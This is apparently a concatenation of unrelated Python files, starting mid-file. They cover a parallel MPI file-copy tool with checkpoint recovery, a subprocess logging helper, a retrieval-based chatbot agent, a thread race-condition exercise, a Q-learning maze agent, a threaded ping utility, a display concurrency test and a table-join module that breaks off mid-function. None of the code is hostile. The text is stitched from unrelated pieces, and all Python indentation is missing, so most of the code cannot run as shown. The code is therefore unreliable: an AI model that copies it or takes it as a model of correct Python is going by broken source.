log.debug("located chkpoint %s, sz=%s, local_cnt=%s" %
(chk_file, sz, local_checkpoint_cnt), extra=dmsg)
total_checkpoint_cnt = circle.comm.allreduce(local_checkpoint_cnt)
log.debug("total_checkpoint_cnt = %s" % total_checkpoint_cnt, extra=dmsg)
verify_checkpoint(chk_file, total_checkpoint_cnt)
# acquire total size
total_sz_mem = circle.comm.allreduce(sz)
total_sz_db = circle.comm.allreduce(sz_db)
T.total_filesize = total_sz_mem + total_sz_db
if T.total_filesize == 0:
if circle.rank == 0:
print("\nRecovery size is 0 bytes, can't proceed.")
circle.exit(0)
if circle.rank == 0:
print("\nResume copy\n")
print("\t{:<20}{:<20}".format("Original size:", bytes_fmt(oldsz)))
print("\t{:<20}{:<20}".format("Recovery size:", bytes_fmt(T.total_filesize)))
print("")
return cobj.workq
def fcp_start():
global circle, fcp, treewalk
workq = None # if fresh start, workq is None
if not args.rid: # if not in recovery
treewalk = FWalk(circle, G.src, G.dest, force=args.force)
circle.begin(treewalk)
circle.finalize()
treewalk.epilogue()
else: # okay, let's do checkpoint recovery
workq = prep_recovery()
circle = Circle(dbname="fcp")
fcp = FCP(circle, G.src, G.dest,
treewalk=treewalk,
totalsize=T.total_filesize,
verify=args.verify,
workq=workq,
hostcnt=num_of_hosts)
set_chunksize(fcp, T.total_filesize)
fcp.checkpoint_interval = args.cptime
fcp.checkpoint_file = ".pcp_workq.%s.%s" % (args.cpid, circle.rank)
circle.begin(fcp)
circle.finalize()
fcp.epilogue()
def get_workq_size(workq):
""" workq is a list of FileChunks, we iterate each and summarize the size,
which amounts to work to be done """
if workq is None:
return 0
sz = 0
for w in workq:
sz += w.length
return sz
def verify_checkpoint(chk_file, total_checkpoint_cnt):
if total_checkpoint_cnt == 0:
if circle.rank == 0:
print("")
print("Error: Can't find checkpoint file: %s" % chk_file)
print("")
circle.exit(0)
def get_oldsize(chk_file):
totalsize = 0
with open(chk_file) as f:
totalsize = int(f.read())
return totalsize
def do_fix_opt(optlist):
""" f is file/dir path """
for ele in optlist:
fi, st = ele
try:
if not stat.S_ISLNK(st.st_mode):
if G.am_root:
os.lchown(fi, st.st_uid, st.st_gid)
os.chmod(fi, st.st_mode)
except OSError as e:
log.warn("fix-opt: lchown() or chmod(): %s" % e, extra=dmsg)
def fix_opt(treewalk):
do_fix_opt(treewalk.optlist)
treewalk.opt_dir_list.sort(reverse=True)
do_fix_opt(treewalk.opt_dir_list)
#
# def store_resume(rid):
# global circle, args
#
# # check and exchange old dataset size
# oldsz = 0
# chk_file, db_file = check_resume_condition(rid)
# if circle.rank == 0:
# oldsz = get_oldsize(chk_file)
# oldsz = circle.comm.bcast(oldsz)
#
# # check and exchange recovery size
# localsz = circle.workq.fsize
# tsz = circle.comm.allreduce(localsz)
#
# if circle.rank == 0:
# print("Original size: %s" % bytes_fmt(oldsz))
# print("Recovery size: %s" % bytes_fmt(tsz))
#
# if tsz == 0:
# if circle.rank == 0:
# print("Recovery size is 0 bytes, can't proceed.")
# circle.exit(0)
#
# # src, dest probably not needed here anymore.
# src = os.path.abspath(args.src)
# dest = os.path.abspath(args.dest)
#
# # resume mode, we don't check destination path
# # dest = check_path(circle, src, dest)
# # note here that we use resume flag
# pcp = FCP(circle, src, dest, resume=True,
# totalsize=tsz, do_checksum=args.checksum,
# hostcnt=num_of_hosts)
#
# pcp.checkpoint_file = chk_file
#
# set_chunksize(pcp, tsz)
# circle.begin(pcp)
# circle.finalize(cleanup=True)
#
# return pcp, tsz
#
#
# def store_start():
# global circle, treewalk, fcp
# src = os.path.abspath(args.src)
# dest = os.path.abspath(args.dest)
# # dest = check_path(circle, src, dest)
#
# treewalk = FWalk(circle, src, dest, force=args.force)
# circle.begin(treewalk)
# treewalk.flushdb()
#
# circle.finalize(cleanup=False)
# T.total_filesize = treewalk.epilogue()
#
# fcp = FCP(circle, src, dest, treewalk=treewalk,
# totalsize=T.total_filesize, do_checksum=args.checksum, hostcnt=num_of_hosts)
# set_chunksize(fcp, T.total_filesize)
# circle.begin(fcp)
#
# # cleanup the db trails
# if treewalk:
# treewalk.cleanup()
#
# if fcp:
# fcp.cleanup()
def get_workq_name():
global args
name = None
if args.cpid:
name = "workq.%s" % args.cpid
elif args.rid:
name = "workq.%s" % args.rid[0]
else:
ts = utils.timestamp()
ts = MPI.COMM_WORLD.bcast(ts)  # all ranks adopt rank 0's timestamp
name = "workq.%s" % ts
return name
def tally_hosts():
""" How many physical hosts are there?
"""
global num_of_hosts
localhost = MPI.Get_processor_name()
hosts = MPI.COMM_WORLD.gather(localhost)
if MPI.COMM_WORLD.rank == 0:
num_of_hosts = len(set(hosts))
num_of_hosts = MPI.COMM_WORLD.bcast(num_of_hosts)
def aggregate_checksums(bfsign):
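# Every non-root rank sends its bloom-filter bitarray to rank 0, which ORs them together
# and derives the dataset signature from the merged filter.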
signature, size, chunksums = None, None, None
if comm.rank > 0:
comm.send(bfsign.bitarray, dest=0)
else:
for p in xrange(1, comm.size):
other_bitarray = comm.recv(source=p)
bfsign.or_bf(other_bitarray)
comm.Barrier()
if comm.rank == 0:
signature = bfsign.gen_signature()
return signature
def gen_signature(bfsign, totalsize):
""" Generate a signature for dataset, it assumes the checksum
option is set and done """
if comm.rank == 0:
print("\nAggregating dataset signature ...\n")
tbegin = MPI.Wtime()
sig = aggregate_checksums(bfsign)
tend = MPI.Wtime()
if comm.rank == 0:
#print("\t{:<20}{:<20}".format("Aggregated chunks:", size))
print("\t{:<20}{:<20}".format("Running time:", utils.conv_time(tend - tbegin)))
print("\t{:<20}{:<20}".format("SHA1 Signature:", sig))
with open(args.output, "w") as f:
f.write("sha1: %s\n" % sig)
f.write("chunksize: %s\n" % fcp.chunksize)
f.write("fcp version: %s\n" % __version__)
f.write("src: %s\n" % fcp.src)
f.write("destination: %s\n" % fcp.dest)
f.write("date: %s\n" % utils.current_time())
f.write("totoalsize: %s\n" % utils.bytes_fmt(totalsize))
#print("\t{:<20}{:<20}".format("Signature File:", export_checksum2(chunksums, args.output)))
def main():
global args, log, circle, fcp, treewalk
# This might be an overkill function
signal.signal(signal.SIGINT, sig_handler)
args = parse_and_bcast(comm, gen_parser)
tally_hosts()
G.loglevel = args.loglevel
G.fix_opt = False if args.no_fixopt else True
G.preserve = args.preserve
G.resume = True if args.cpid else False
G.reduce_interval = args.reduce_interval
G.verbosity = args.verbosity
G.am_root = True if os.geteuid() == 0 else False
G.memitem_threshold = args.item
if args.signature: # with signature implies doing verify as well
args.verify = True
if args.rid:
G.resume = True
args.force = True
G.rid = args.rid
args.signature = False # when recovery, no signature
if not args.cpid:
ts = utils.timestamp()
args.cpid = MPI.COMM_WORLD.bcast(ts)
G.tempdir = os.path.join(os.getcwd(),(".pcircle" + args.cpid))
if not os.path.exists(G.tempdir):
try:
os.mkdir(G.tempdir)
except OSError:
pass
G.src, G.dest = check_source_and_target(args.src, args.dest)
dbname = get_workq_name()
circle = Circle(dbname="fwalk")
#circle.dbname = dbname
global oflimit
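# Per-process open-file budget: spread the soft RLIMIT_NOFILE (minus a 64-fd reserve) over
# the processes on a host, then halve it (presumably because each worker keeps separate read
# and write fd caches), with a floor of 8.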
if num_of_hosts != 0:
max_ofile, _ = resource.getrlimit(resource.RLIMIT_NOFILE)
procs_per_host = circle.size // num_of_hosts
oflimit = ((max_ofile - 64) // procs_per_host) // 2
if oflimit < 8:
oflimit = 8
if circle.rank == 0:
print("Running Parameters:\n")
print("\t{:<25}{:<20}".format("Starting at:", utils.current_time()))
print("\t{:<25}{:<20}".format("FCP version:", __version__))
print("\t{:<25}{:<20}".format("Source:", utils.choplist(G.src)))
print("\t{:<25}{:<20}".format("Destination:", os.path.abspath(args.dest)))
print("\t{:<25}{:<10}{:5}{:<25}{:<10}".format("Num of Hosts:", num_of_hosts, "|",
"Num of Processes:", comm.size))
print("\t{:<25}{:<10}{:5}{:<25}{:<10}".format("Overwrite:", "%r" % args.force, "|",
"Copy Verification:", "%r" % args.verify))
print("\t{:<25}{:<10}{:5}{:<25}{:<10}".format("Dataset signature:", "%r" % args.signature, "|",
"Stripe Preserve:", "%r" % G.preserve))
print("\t{:<25}{:<10}{:5}{:<25}{:<10}".format("Checkpoint interval:", "%s" % utils.conv_time(args.cptime), "|",
"Checkpoint ID:", "%s" % args.cpid))
print("\t{:<25}{:<10}{:5}{:<25}{:<10}".format("Items in memory: ",
" % r" % G.memitem_threshold, "|", "O file limit", "%s" % oflimit))
#
if args.verbosity > 0:
print("\t{:<25}{:<20}".format("Copy Mode:", G.copytype))
fcp_start()
if args.pause and args.verify:
if circle.rank == 0:
# raw_input("\n--> Press any key to continue ...\n")
print("Pause, resume after %s seconds ..." % args.pause)
sys.stdout.flush()
time.sleep(args.pause)
circle.comm.Barrier()
# do checksum verification
if args.verify:
circle = Circle(dbname="verify")
pcheck = PVerify(circle, fcp, G.total_chunks, T.total_filesize, args.signature)
circle.begin(pcheck)
circle.finalize()
tally = pcheck.fail_tally()
tally = comm.bcast(tally)
if circle.rank == 0:
print("")
if tally == 0:
print("\t{:<20}{:<20}".format("Verify result:", "PASS"))
else:
print("\t{:<20}{:<20}".format("Verify result:", "FAILED"))
comm.Barrier()
if args.signature and tally == 0:
gen_signature(pcheck.bfsign, T.total_filesize)
# fix permission
comm.Barrier()
if G.fix_opt and treewalk:
if comm.rank == 0:
print("\nFixing ownership and permissions ...")
fix_opt(treewalk)
if treewalk:
treewalk.cleanup()
if fcp:
fcp.cleanup()
#if circle:
# circle.finalize(cleanup=True)
comm.Barrier()
if comm.rank == 0:
try:
os.rmdir(G.tempdir)
except:
pass
# TODO: a close file error can happen when circle.finalize()
#
#if isinstance(circle.workq, DbStore):
# circle.workq.cleanup()
if __name__ == "__main__":
main()
|
subprocess_.py
|
import subprocess
import os
import sys
import traceback
import glob
from os.path import join
from multiprocessing import Pool, Value
import multiprocessing
import time
from termcolor import cprint
from threading import Thread
from queue import Queue, Empty
from msbase.logging import logger
def timed(func):
def function_wrapper(*args, **kwargs):
now = time.time()
ret = func(*args, **kwargs)
logger.info("%s(%s, %s) spent %.2fs" %
(func.__qualname__, args, kwargs, time.time() - now))
return ret
return function_wrapper
ON_POSIX = 'posix' in sys.builtin_module_names
def enqueue_output(out, queue):
for line in iter(out.readline, b''):
queue.put(line)
out.close()
def call_std(args, cwd=None, env={}, output=True, timeout_s=None):
if output:
p = subprocess.Popen(args, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, bufsize=1,
close_fds=ON_POSIX, cwd=cwd, env=dict(os.environ, **env))
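# Drain stdout/stderr on daemon threads into queues so the polling loop below never blocks
# on a full pipe (and the child process never stalls while writing to it).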
start_time = time.time()
stdout = ""
q_stdout = Queue()
t_stdout = Thread(target=enqueue_output, args=(p.stdout, q_stdout))
t_stdout.daemon = True
t_stdout.start()
stderr = ""
q_stderr = Queue()
t_stderr = Thread(target=enqueue_output, args=(p.stderr, q_stderr))
t_stderr.daemon = True
t_stderr.start()
while True:
return_code = p.poll()
if return_code is not None:
break
try:
stdout_line = str(q_stdout.get_nowait(), "utf-8")
except Empty:
stdout_line = ''
try:
stderr_line = str(q_stderr.get_nowait(), "utf-8")
except Empty:
stderr_line = ''
if stdout_line:
stdout += stdout_line
logger.info(stdout_line.rstrip())
if stderr_line:
stderr += stderr_line
logger.warning(stderr_line.rstrip())
if timeout_s is not None and time.time() - start_time > timeout_s:
p.kill()
return (-1, "", "TIMEOUT!")
while True:
try:
stdout_line = str(q_stdout.get(timeout=.1), "utf-8")
except Empty:
break
stdout += stdout_line
logger.info(stdout_line.rstrip())
if timeout_s is not None and time.time() - start_time > timeout_s:
p.kill()
return (-1, "", "TIMEOUT!")
while True:
try:
stderr_line = str(q_stderr.get(timeout=.1), "utf-8")
except Empty:
break
stderr += stderr_line
logger.warning(stderr_line.rstrip())
if timeout_s is not None and time.time() - start_time > timeout_s:
p.kill()
return (-1, "", "TIMEOUT!")
return (return_code, stdout, stderr)
else:
code = subprocess.call(args, cwd=cwd, env=dict(os.environ, **env), timeout=timeout_s)
return (code, None, None)
@timed
def try_call_std(args, cwd=None, env={}, verbose=True,
output=True, noexception=False, timeout_s=None):
'''An asynchronously-logged process executor
that returns the essential information you need:
stdout, stderr and the return code.
'''
if verbose:
cprint("+ " + " ".join(args), "blue")
code, stdout, stderr = call_std(args, cwd, env, output, timeout_s=timeout_s)
if not noexception and code != 0:
if verbose:
print("STDOUT: ")
print(stdout)
print("STDERR: ")
cprint(stderr, "red")
raise Exception(str(code) + ": calling " + " ".join(args) + " failed")
else:
return stdout, stderr, code
def multiprocess(task, inputs, n: int, verbose=True, return_dict=True, throws=False, debug_mode=False):
'''How to use this effectively:
1. Use debug_mode=True to switch to a tracked, sequential for-loop
'''
if debug_mode:
results = []
for arg in inputs:
start_time = time.time()
logger.info("Working on %s" % arg)
results.append(task(arg))
logger.info("Time spent: %.2f" % (time.time() - start_time))
return results
counter = Value('i', 0)
total = float(len(inputs))
start_time = time.time()
global run
def run(input):
with counter.get_lock():
if verbose:
logger.info("%fs - progress: %f" % (time.time() - start_time, counter.value / total))
counter.value += 1
try:
return (True, task(input))
except Exception as e:
return (False, "%s\n%s" % (e, traceback.format_exc()))
with Pool(n) as p:
results = p.map(run, inputs)
if verbose:
logger.info("total spent time: %f" % (time.time() - start_time))
if throws:
ret = []
for ok, r in results:
if not ok:
raise Exception(str(r))
ret.append(r)
return ret
if return_dict:
return dict(zip(inputs, results))
else:
return results
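# Illustrative usage (not part of the original module; commands and inputs are placeholders):
#   stdout, stderr, code = try_call_std(["echo", "hello"], timeout_s=10)
#   # multiprocess() maps each input to an (ok, result) tuple unless throws=True
#   results = multiprocess(len, ["a", "bb", "ccc"], n=2)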
|
control.py
|
# -*- coding: utf-8 -*-
from random import choice
import pickle
import threading
import time
import jieba
from gensim.models.doc2vec import Doc2Vec, LabeledSentence
from sklearn.externals import joblib
import numpy as np
from bert_serving.client import BertClient
from retrieval_documents import Retrieval
from fuzzy_match import fuzzy_matching
from tf_idf import TfIdf
from config import config, frequency_domain
NUM_OF_IR = 20
class Agent:
good_qualified_corpus = set()
def __init__(self):
self.config = config
self.stop_words = ''
self.punctuation_str = ''.join(self.config.punctuation_ls)
self.frequency_domain_dict = frequency_domain.frequency_dict
self.cluster_md = self.config.cluster_model
# self.vec_md = self.config.doc_vector_model
self.init_all_states()
self.fuzzy_weight = 0.2
self.tf_idf_weight = 0.8
self.good_corpus_threshold = 200
self.good_corpus_score = 0.95
def init_all_states(self):
self.retrieval = Retrieval(num_ir=NUM_OF_IR, config=self.config)
self.tf_idf = TfIdf(self.config)
self.cluster_model = joblib.load(self.cluster_md)
# self.vec_model = Doc2Vec.load(self.vec_md)
# self.vec_model = BertClient()
self.load_stop_words(self.config)
jieba.initialize()
def get_utterance_type(self, utterance):
# tmp_vector = self.vec_model.infer_vector(utterance)
# tmp_vector = self.vec_model.encode([utterance])
# label = self.cluster_model.predict(tmp_vector)
# print(label)
# return self.config.cluster_file[label[0]]
return self.config.cluster_file[0]
def record_good_conversations(self, utterance, score_ls, context_ls):
def write_conversations():
localtime = (time.asctime(time.localtime(time.time()))).replace(' ', '_').replace(':', '-')
with open(self.config.path_of_good_conversation+localtime, 'wb') as wfp:
pickle.dump(Agent.good_qualified_corpus, wfp)
Agent.good_qualified_corpus.clear()
# print(Agent.good_qualified_corpus)
for index in range(len(score_ls)):
if score_ls[index] > self.good_corpus_score:
if context_ls[index][0] and context_ls[index][1]:
# print((utterance, context_ls[index][1]))
Agent.good_qualified_corpus.add((utterance, context_ls[index][1]))
# print(len(Agent.good_qualified_corpus))
if len(Agent.good_qualified_corpus) > self.good_corpus_threshold:
record_thread = threading.Thread(target=write_conversations)
record_thread.start()
def random_chose_index(self, score_ls, max_score):
max_score_indexes = []
for i in range(len(score_ls)):
if score_ls[i] == max_score:
max_score_indexes.append(i)
return choice(max_score_indexes)
def load_stop_words(self, config):
with open(config.stop_words, 'rb') as fpr:
self.stop_words = pickle.load(fpr)
def remove_special_words(self, stop_words_ls, input_sentence):
sentence = input_sentence
for special_word in self.config.special_modal_words:
if special_word in sentence:
sentence = sentence.replace(special_word, '')
return sentence
def response_answer(self, reply_msg, max_score):
if type(max_score) is np.ndarray:
final_max_score = max_score[0][0]
else:
final_max_score = max_score
return reply_msg, final_max_score
def get_answer(self, utterance, file_name=None):
try:
utterance = utterance.rstrip(self.punctuation_str)
file_name = self.get_utterance_type(utterance)
self.retrieval.read_indexes(file_name)
context_ls = self.retrieval.search_sentences(utterance, self.stop_words)
if not context_ls:
return "", 0
utterance_no_stop = self.remove_special_words(self.stop_words, utterance)
new_context_ls = []
for each_context in context_ls:
ques = self.remove_special_words(self.stop_words, each_context[0])
ans = self.remove_special_words(self.stop_words, each_context[1])
if not ques or not ans:
new_context_ls.append((0, 0))
continue
new_context_ls.append((ques, ans))
# print("control!!!!!!!!!!!!!!!!!: {},{}".format(utterance, new_context_ls))
# print(len(new_context_ls))
fuzzy_ratio_ls = fuzzy_matching(utterance_no_stop, new_context_ls)
self.tf_idf.select_model(file_name)
self.tf_idf.predict_tfidf(utterance_no_stop, new_context_ls)
tf_idf_score_ls = self.tf_idf.calculate_distances()
if fuzzy_ratio_ls.count(max(fuzzy_ratio_ls)) > 1:
fuzzy_best_index = self.random_chose_index(fuzzy_ratio_ls, max(fuzzy_ratio_ls))
else:
fuzzy_best_index = fuzzy_ratio_ls.index(max(fuzzy_ratio_ls))
if tf_idf_score_ls.count(max(tf_idf_score_ls)) > 1:
tftdf_best_index = self.random_chose_index(tf_idf_score_ls, max(tf_idf_score_ls))
else:
tftdf_best_index = tf_idf_score_ls.index(max(tf_idf_score_ls))
fuzzy_best_content = context_ls[fuzzy_best_index][0].rstrip(self.punctuation_str)
tfidf_best_content = context_ls[tftdf_best_index][0].rstrip(self.punctuation_str)
if fuzzy_best_content == utterance or utterance.strip(''.join(config.special_modal_words)) in fuzzy_best_content:
best_index = fuzzy_best_index
# return context_ls[best_index][1], max(fuzzy_ratio_ls)
return self.response_answer(context_ls[best_index][1], max(fuzzy_ratio_ls))
if tfidf_best_content == utterance or utterance.strip(''.join(config.special_modal_words)) in tfidf_best_content:
best_index = tftdf_best_index
# return context_ls[best_index][1], max(tf_idf_score_ls)
return self.response_answer(context_ls[best_index][1], max(tf_idf_score_ls))
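# Otherwise blend the fuzzy-match ratio and the TF-IDF similarity into one score per
# candidate, using the fixed weights set in __init__ (0.2 fuzzy / 0.8 tf-idf).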
final_score_ls = [(fuzzy_ratio * self.fuzzy_weight + tf_tdf_score * self.tf_idf_weight) for fuzzy_ratio, tf_tdf_score in
zip(fuzzy_ratio_ls, tf_idf_score_ls)]
# TODO: find a suitable weight
self.record_good_conversations(utterance, final_score_ls, context_ls)
max_score = max(final_score_ls)
if final_score_ls.count(max_score) > 1:
best_index = self.random_chose_index(final_score_ls, max_score)
else:
best_index = final_score_ls.index(max_score)
# print("final result:{}".format(context_ls[best_index]))
# print(type(max_score))
return self.response_answer(context_ls[best_index][1], max_score)
except Exception as e:
return "", 0
def test(self, utterance):
answer = self.get_answer(utterance)
return answer
def start_cmd(self):
while True:
utterance = input(">>>")
if utterance.strip() == "exit1":
break
answer, score = self.get_answer(utterance)
print("<<<{}:{}".format(answer, score))
def api(self, utterance):
answer, score = self.get_answer(utterance)
return [answer, score]
def socket_get(self, utterance):
answer, score = self.get_answer(utterance)
# print(answer + '---' + str(score[0][0]))
return answer + '---' + str(score)
if __name__ == '__main__':
agent = Agent()
agent.start_cmd()
|
foo.py
|
# Python 3.3.3 and 2.7.6
# python foo.py
from threading import Thread
# Potentially useful thing:
# In Python you "import" a global variable, instead of "export"ing it when you declare it
# (This is probably an effort to make you feel bad about typing the word "global")
i = 0
def incrementingFunction():
global i
for t in range (0,10000000):
i=i+1
# increments i 10,000,000 times
def decrementingFunction():
global i
for t in range (0,10000000):
i=i-1
# decrements i 10,000,000 times
def main():
# TODO: Something is missing here (needed to print i)
global i
incrementing = Thread(target = incrementingFunction, args = (),)
decrementing = Thread(target = decrementingFunction, args = (),)
# TODO: Start both threads
incrementing.start()
decrementing.start()
incrementing.join()
decrementing.join()
print("The magic number is %d" % (i))
main()
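# --- Added illustration (not part of the original foo.py): the two loops above race on the
# --- shared counter, so the printed "magic number" is usually not 0. A minimal sketch of the
# --- same experiment with every update guarded by a threading.Lock, which makes the result
# --- deterministically 0; the names below are ours and the iteration count is illustrative.
from threading import Lock

counter = 0
counter_lock = Lock()

def locked_increment(n=1000000):
    global counter
    for _ in range(n):
        with counter_lock:  # serialize the read-modify-write on the shared counter
            counter += 1

def locked_decrement(n=1000000):
    global counter
    for _ in range(n):
        with counter_lock:
            counter -= 1

def locked_main():
    threads = [Thread(target=locked_increment), Thread(target=locked_decrement)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    print("With a lock the magic number is %d" % counter)  # always 0

locked_main()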
|
maze_escaping.py
|
# -*- coding: utf-8 -*-
import maze
import threading
import time
discount = 0.3
actions = maze.actions
states = []
Q = {}
for i in range(maze.x):
for j in range(maze.y):
states.append((i, j))
for state in states:
temp = {}
for action in actions:
temp[action] = 0.1
maze.set_cell_score(state, action, temp[action])
Q[state] = temp
for (i, j, c, w) in maze.specials:
for action in actions:
Q[(i, j)][action] = w
maze.set_cell_score((i, j), action, w)
def do_action(action):
s = maze.player
r = -maze.score
if action == actions[0]:
maze.try_move(0, -1)
elif action == actions[1]:
maze.try_move(0, 1)
elif action == actions[2]:
maze.try_move(-1, 0)
elif action == actions[3]:
maze.try_move(1, 0)
else:
return
s2 = maze.player
r += maze.score
return s, action, r, s2
def max_Q(s):
val = None
act = None
for a, q in Q[s].items():
if val is None or (q > val):
val = q
act = a
return act, val
def inc_Q(s, a, alpha, inc):
Q[s][a] *= 1 - alpha
Q[s][a] += alpha * inc
maze.set_cell_score(s, a, Q[s][a])
def run():
global discount
time.sleep(10)
alpha = 1
t = 1
while True:
# Pick the right action
s = maze.player
max_act, max_val = max_Q(s)
(s, a, r, s2) = do_action(max_act)
# Update Q
max_act, max_val = max_Q(s2)
inc_Q(s, a, alpha, r + discount * max_val)
# Check if the game has restarted
t += 1.0
if maze.has_restarted():
maze.restart_game()
time.sleep(0.01)
t = 1.0
# Update the learning rate
alpha = pow(t, -0.1)
# MODIFY THIS SLEEP IF THE GAME IS GOING TOO FAST.
time.sleep(0.1)
t = threading.Thread(target=run)
t.daemon = True
t.start()
maze.start_game()
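# --- Added note (not part of the original maze_escaping.py): inc_Q above applies the standard
# --- tabular Q-learning backup Q(s,a) <- (1-alpha)*Q(s,a) + alpha*(r + discount*max_a' Q(s2,a')).
# --- A self-contained sketch of the same update on a plain dict-of-dicts (all names are ours):
def q_learning_update(q_table, s, a, r, s_next, alpha=0.5, gamma=0.3):
    """Apply one tabular Q-learning backup in place and return the new Q(s, a)."""
    best_next = max(q_table[s_next].values()) if q_table[s_next] else 0.0
    q_table[s][a] = (1 - alpha) * q_table[s][a] + alpha * (r + gamma * best_next)
    return q_table[s][a]

# Example: q = {'s0': {'up': 0.1}, 's1': {'up': 0.5}}; q_learning_update(q, 's0', 'up', 1.0, 's1')
# leaves q['s0']['up'] == 0.5 * 0.1 + 0.5 * (1.0 + 0.3 * 0.5) = 0.625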
|
ping.py
|
#!/usr/bin/env python3
import subprocess
import sys
import threading
import obozrenie.helpers as helpers
def add_rtt_info(array):
"""Appends server response time to the table."""
hosts_array = []
for entry in array:
host = entry['host'].split(":")
if len(host) > 1:
host = ":".join(host[0:-1])
else:
host = ":".join(host)
hosts_array.append(host)
pinger = Pinger()
pinger.hosts = list(set(hosts_array))
pinger.action = "ping"
pinger.status.clear()
rtt_array = pinger.start()
# Match ping in host list.
for entry in array:
host = entry['host'].split(":")
if len(host) > 1:
host = ":".join(host[0:-1])
else:
host = ":".join(host)
entry["ping"] = rtt_array[host]
class Pinger():
status = {} # Populated while we are running
hosts = [] # List of all hosts/ips in our input queue
action = "ping"
options = []
# How many ping process at the time.
thread_count = 100
# Lock object to keep track the threads in loops, where it can potentially be race conditions.
lock = threading.Lock()
def ping(self, entry):
"""Pings the requested server. Note: this function is not threaded yet, therefore pinging may take up to a second."""
if sys.platform == 'win32':
ping_cmd = ["ping", '-n', '1', entry]
else:
ping_cmd = ["ping", '-c', '1', '-n', '-W', '1', entry]
ping_output_byte, _ = subprocess.Popen(ping_cmd, stdout=subprocess.PIPE).communicate()
ping_output = ping_output_byte.decode()
try:
if sys.platform == 'win32':
rtt_info = ping_output.rstrip('\n').split('\n')[-1].split(',')[0].split('=')[-1].strip('ms')
else:
rtt_info = ping_output.split('\n')[1].split('=')[-1].split(' ')[0]
rtt_num = round(float(rtt_info))
except (ValueError, IndexError): # the ping output could not be parsed; treat the host as unreachable
rtt_num = 9999
return rtt_num
def pop_queue(self):
entry = None
self.lock.acquire() # Grab or wait+grab the lock.
if self.hosts:
entry = self.hosts.pop()
self.lock.release() # Release the lock, so another thread could grab it.
return entry
def dequeue(self):
while True:
entry = self.pop_queue()
if not entry:
return None
if self.action == "ping":
result = self.ping(entry)
else:
result = None
self.status[entry] = result
def start(self):
threads = []
for i in range(self.thread_count):
# Create self.thread_count number of threads that together will
# cooperate removing every ip in the list. Each thread will do the
# job as fast as it can.
t = threading.Thread(target=self.dequeue)
t.start()
threads.append(t)
# Wait until all the threads are done. .join() is blocking.
[t.join() for t in threads]
return self.status
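# --- Added illustration (not part of the original ping.py): Pinger hand-rolls a worker pool with
# --- a Lock-protected host list. The same fan-out can be written with the standard library's
# --- concurrent.futures; ping_one below stands in for Pinger.ping and the helper name is ours,
# --- not part of this module's API.
from concurrent.futures import ThreadPoolExecutor

def ping_all(hosts, ping_one, max_workers=100):
    """Return {host: rtt_ms} by running ping_one over hosts concurrently."""
    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        return dict(zip(hosts, pool.map(ping_one, hosts)))

# Example: rtt = ping_all(["127.0.0.1", "192.0.2.1"], Pinger().ping)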
|
test_concurrency.py
|
from threading import Thread
from nose.tools import ok_
from pyvirtualdisplay.display import Display
def test_with():
ls = [0, 0]
def f1():
ls[0] = Display()
# d1.start()
def f2():
ls[1] = Display()
# d2.start()
t1 = Thread(target=f1)
t2 = Thread(target=f2)
t1.start()
t2.start()
t1.join()
t2.join()
# print ls
dv1 = ls[0].new_display_var
dv2 = ls[1].new_display_var
# print dv1
# print dv2
ok_(dv1 != dv2)
# ok_(0)
|
join.py
|
from Table import Table
import numpy as np
from schemas import *
import threading
def recup_index_lig(tab, Nom):
for index, element in enumerate(tab.col_names):
if element == Nom:
# print (index)
return index
def recup_index_col(tab, lig, test):
liste = []
if (tab.storage == 'row'):
for i in range(tab.data.shape[0]):
if (tab.data[i][lig] == test):
liste.append(i)
else:
for i in range(len(tab.data[lig][:])):
if (tab.data[lig][i] == test):
liste.append(i)
# print(liste)
return liste
def join_multithread(tab1, key1, tab2, key2, num_threads):
test_scheme = {**tab1.schema, **tab2.schema}
del test_scheme[key2]
n_rows = max(tab1.n_rows, tab2.n_rows)
indexlig = recup_index_lig(tab1, key1)
indexlig2 = recup_index_lig(tab2, key2)
joint = Table(test_scheme, n_rows, tab1.name + " " + tab2.name, tab1.storage)
if tab1.storage == "row":
test = list(set(tab1.data[:, indexlig]))
joint.data=np.empty((0,tab1.n_cols+tab2.n_cols-1))
else:
test = list(set(tab1.data[indexlig][:]))
joint.data=[]
for i in range(tab1.n_cols+tab2.n_cols-1):
joint.data.append([])
threads_list = np.empty(num_threads, dtype=object)
threads_t = np.array_split(np.array(test), num_threads)
idx = np.array_split(np.array(range(0,n_rows)), num_threads)
def single_thread_join(tt,a):
tab = []
if (tab1.storage == 'row'):
temp= []
res1=[]
res2 = []
for t,key in enumerate(tt):
index = recup_index_col(tab1, indexlig, key)
index2 = recup_index_col(tab2, indexlig2, key)
for i in range(len(index)):
for j in range(len(index2)):
temp = []
res1=[]
res2 = []
# temp.append(key)
for k in range(tab1.n_cols):
res1.append(tab1.data[index[i], k])
for k2 in range(tab2.n_cols):
if (k2 != indexlig2):
res2.append(tab2.data[index2[j], k2])
if res1!=[] and res2!=[]:
temp=res1+res2
joint.data = np.append(joint.data, [np.array(temp, dtype=object)],axis=0)
else:
for key in tt:
temp= []
res1=[]
res2 = []
index = recup_index_col(tab1, indexlig, key)
index2 = recup_index_col(tab2, indexlig2, key)
for i in range(len(index)):
for j in range(len(index2)):
temp = []
res1=[]
res2 = []
# temp.append(key)
for k in range(tab1.n_cols):
res1.append(tab1.data[k][index[i]])
for k2 in range(tab2.n_cols):
if (k2 != indexlig2):
res2.append(tab2.data[k2][index2[j]])
if res1!=[] and res2!=[]:
temp=res1+res2
for w,val in enumerate(temp):
joint.data[w].append(val)
for i in range(num_threads):
threads_list[i] = threading.Thread(target=single_thread_join, args=(threads_t[i], 1))
# Starting Threads
for t in threads_list:
t.start()
# Waiting for all threads to finish
for t in threads_list:
t.join()
return joint
def join(tab1, key1, tab2, key2):
test_scheme = {**tab1.schema, **tab2.schema}
del test_scheme[key2]
tab = []
indexlig = recup_index_lig(tab1, key1)
indexlig2 = recup_index_lig(tab2, key2)
if (tab1.storage == 'row'):
test = list(set(tab1.data[:, indexlig]))
for key in test:
index = recup_index_col(tab1, indexlig, key)
index2 = recup_index_col(tab2, indexlig2, key)
for i in range(len(index)):
for j in range(len(index2)):
temp = []
# temp.append(key)
for k in range(tab1.n_cols):
temp.append(tab1.data[index[i], k])
for k2 in range(tab2.n_cols):
if (k2 != indexlig2):
temp.append(tab2.data[index2[j], k2])
tab.append(temp)
tab = np.array(tab)
joint = Table(test_scheme, tab.shape[0], tab1.name + " " + tab2.name, tab1.storage)
joint.fill_data(tab)
else:
test = list(set(tab1.data[indexlig][:]))
for key in test:
index = recup_index_col(tab1, indexlig, key)
